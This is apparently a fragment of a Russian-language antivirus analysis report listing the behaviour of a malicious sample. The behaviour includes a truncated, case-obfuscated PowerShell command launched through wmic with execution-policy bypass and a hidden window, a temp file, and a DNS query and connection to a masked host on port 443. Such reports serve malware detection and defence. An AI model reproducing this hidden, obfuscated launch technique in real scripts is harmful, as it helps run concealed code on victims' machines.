Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' "pRoCEss" 'calL' creAtE "PoWERSheLL -NOpr -noNinTERAcTIVe -exeCUTIonpOLic BYpASS $GAB =([CHaR]34).TOSTriNg() ;$PJ= ([CHAr]44).ToSTrIng() ;iex( "\"si vARIaBlE:frle ([tYPE](${GAB}{0}{3}{1}...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1116
- %TEMP%\1092406.cvr
- 'ge###aga.com':443
- DNS ASK ge###aga.com
- '<SYSTEM32>\wbem\wmic.exe' "pRoCEss" 'calL' creAtE "PoWERSheLL -NOpr -noNinTERAcTIVe -exeCUTIonpOLic BYpASS $GAB =([CHaR]34).TOSTriNg() ;$PJ= ([CHAr]44).ToSTrIng() ;iex( "\"si vARIaBlE:frle ([tYPE](${GAB}{0}{3}{1}...' (со скрытым окном)